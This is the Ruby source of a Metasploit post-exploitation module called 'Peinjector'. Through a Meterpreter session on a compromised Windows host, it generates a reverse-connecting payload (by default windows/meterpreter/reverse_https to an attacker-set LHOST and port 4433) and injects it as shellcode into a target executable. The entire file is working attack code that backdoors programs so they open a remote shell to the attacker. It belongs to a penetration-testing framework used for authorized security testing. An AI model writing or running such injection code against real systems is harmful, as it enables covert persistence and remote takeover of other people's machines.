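require 'rex'

# Post module that injects a chosen Windows payload into an executable on the
# compromised host using the Meterpreter "peinjector" extension.
class MetasploitModule < Msf::Post
  include Msf::Post::Common

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Peinjector',
        'Description' => %q{
          This module will inject a specified windows payload into a target executable.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Maximiliano Tedesco <[email protected]>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              peinjector_inject_shellcode
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the target executable.', 'windows/meterpreter/reverse_https']),
        OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
        OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
        OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
      ]
    )
  end

  # Entry point: validates the datastore, builds the payload and injects it.
  #
  # @return [void]
  def run
    session.core.use('peinjector')

    # sysinfo is only available on meterpreter sessions
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    pay_name = datastore['PAYLOAD']
    targetpe = datastore['TARGETPE']

    # Only a Windows payload known to the framework can be injected
    unless session.framework.payloads.module_refnames.grep(/windows/).include?(pay_name)
      print_error("The Payload specified #{pay_name} is not valid for this system")
      return
    end

    # TARGETPE is not a required option, but the injection cannot proceed without it;
    # fail here with a clear message instead of deep inside the extension call
    if targetpe.blank?
      print_error('TARGETPE must be set to the path of the executable to inject into')
      return
    end

    payload = create_payload(pay_name, datastore['LHOST'], datastore['LPORT'], datastore['OPTIONS'])
    inject_payload(payload, targetpe)
  end

  # Builds a payload instance and applies the connection settings plus any
  # extra 'opt=val' pairs before validating its options.
  #
  # @param name [String] payload reference name, e.g. 'windows/meterpreter/reverse_https'
  # @param lhost [String] listener address written to the payload datastore
  # @param lport [Integer] listener port written to the payload datastore
  # @param opts [String, nil] comma separated 'opt=val' pairs applied on top of the defaults
  # @return [Msf::Payload] the configured payload
  def create_payload(name, lhost, lport, opts = '')
    pay = client.framework.payloads.create(name)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    pay.datastore['EXITFUNC'] = 'thread'
    # A large available space makes the framework generate a proper UUID so the
    # payload works with the universal handler
    pay.available_space = 1.gigabyte

    unless opts.blank?
      opts.split(',').each do |pair|
        # split with a limit of 2 so a value containing '=' is kept intact
        key, value = pair.split('=', 2)
        pay.datastore[key] = value
      end
    end

    # Let the payload's own option validation reject a bad datastore
    pay.options.validate(pay.datastore)
    pay
  end

  # Wraps the generated shellcode in an architecture-matching thread stub and
  # hands it to the peinjector extension for injection into the target executable.
  #
  # @param pay [Msf::Payload] configured payload (see #create_payload)
  # @param targetpe [String] path of the executable on the target host
  # @return [void]
  def inject_payload(pay, targetpe)
    print_status('Generating payload')
    raw = pay.generate

    # The thread stub must match the payload architecture
    x64 = pay.arch.join == ARCH_X64
    threaded_shellcode = if x64
                           client.peinjector.add_thread_x64(raw)
                         else
                           client.peinjector.add_thread_x86(raw)
                         end

    param = {
      isx64: x64,
      shellcode: threaded_shellcode,
      targetpe: targetpe,
      size: threaded_shellcode.length
    }

    print_status("Injecting #{pay.name} into the executable #{targetpe}")
    client.peinjector.inject_shellcode(param)
    print_good("Successfully injected payload into the executable: #{targetpe}")
  rescue StandardError => e
    # Report using the method argument: +param+ is still nil when generate() or
    # the thread stub call raised, so a hash lookup here would itself blow up
    print_error("Failed to Inject Payload to executable #{targetpe}!")
    print_error(e.to_s)
  end
end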